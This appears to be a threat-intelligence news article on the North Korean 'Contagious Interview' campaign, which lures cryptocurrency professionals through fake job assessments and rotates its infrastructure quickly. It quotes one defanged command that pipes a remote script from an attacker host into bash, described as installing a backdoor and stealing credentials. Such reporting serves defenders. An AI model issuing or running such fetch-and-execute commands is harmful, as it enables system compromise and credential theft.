North Korean Threat Actors Reveal Their Tactics in Replacing Infrastructure With New Assets

Over the past year, cybersecurity researchers have observed a surge in activity from North Korean threat actors leveraging military-grade social engineering techniques to target professionals in the cryptocurrency industry.

This campaign, dubbed Contagious Interview, employs a deceptively benign job-application process that masks the delivery of sophisticated malware.

Victims receive invitations to participate in mock assessments for roles at fictitious firms, only to be lured into executing malicious scripts.

The attackers maintain a vast network of infrastructure, rapidly replacing compromised domains and servers to evade takedowns and sustain high levels of engagement.

Early in 2025, the adversaries began registering domains with names such as skillquestions[.]com and talentcheck[.]pro, setting up lure websites that prompt candidates to run shell commands under the guise of troubleshooting errors.

During the assessment, an on-page error appears—typically a camera-access prompt—which directs victims to paste a curl command in their terminal.

This simple payload download step quickly escalates to a full compromise, as the malware establishes persistent access and exfiltrates credentials.

The careful orchestration of these steps combined with tailored domain names has led to over 230 confirmed victim engagements within a three-month period.

SentinelLABS analysts noted that these operations are underpinned by continuous monitoring of threat intelligence platforms such as Validin and VirusTotal.

By registering community accounts shortly after new Indicators of Compromise (IOCs) are published in repositories like Maltrail’s apt_lazarus[.]txt, the adversaries ensure they have the latest insights into their own infrastructure exposure.

Rather than investing in comprehensive modifications to existing assets, they opt to spin up entirely new servers whenever a domain faces disruption.

This strategic choice favors operational agility over fortress-style defenses, enabling the actors to stay one step ahead of takedown requests.

SentinelLABS researchers identified that the infrastructure replacement cycle is measured in hours rather than weeks.

When a service provider disables a domain, the threat actors immediately provision a fresh domain, migrate their malware distribution servers, and update command-and-control endpoints.

Behind the scenes, coordination occurs through team collaboration platforms like Slack, where automated bots post summaries of new domains, and individual operators click through these previews in rapid succession.

Infection Mechanism

At the heart of the Contagious Interview campaign lies a minimalist yet effective infection mechanism.

Upon visiting the lure site, targets encounter a JavaScript-powered form that simulates a live coding assessment.

When they trigger the fabricated error, the page displays a terminal command:-

curl - s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash

Executing this command fetches a shell script that performs environment checks, detects the victim’s operating system, and downloads a tailored payload.

The script then installs a lightweight backdoor, writes a cron entry for persistence, and communicates with the actor-controlled C2 server over HTTPS to register the compromised host.

All stages are logged by the ContagiousDrop Node[.]js application on the server, creating detailed victimology records in JSON files such as client_ips_start_test[.]json.

This blend of social engineering and automated scripting maximizes infection rates while minimizing developer effort, reflecting a maturation of DPRK offensive capabilities.

Through these adaptive tactics—rapid infrastructure turnover, intelligence-driven asset scouting, and streamlined payload delivery—North Korean threat actors continue to pose a dynamic and persistent threat.

As defenders strengthen detection protocols, understanding this infection mechanism remains crucial in disrupting the attack chain before initial contact.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.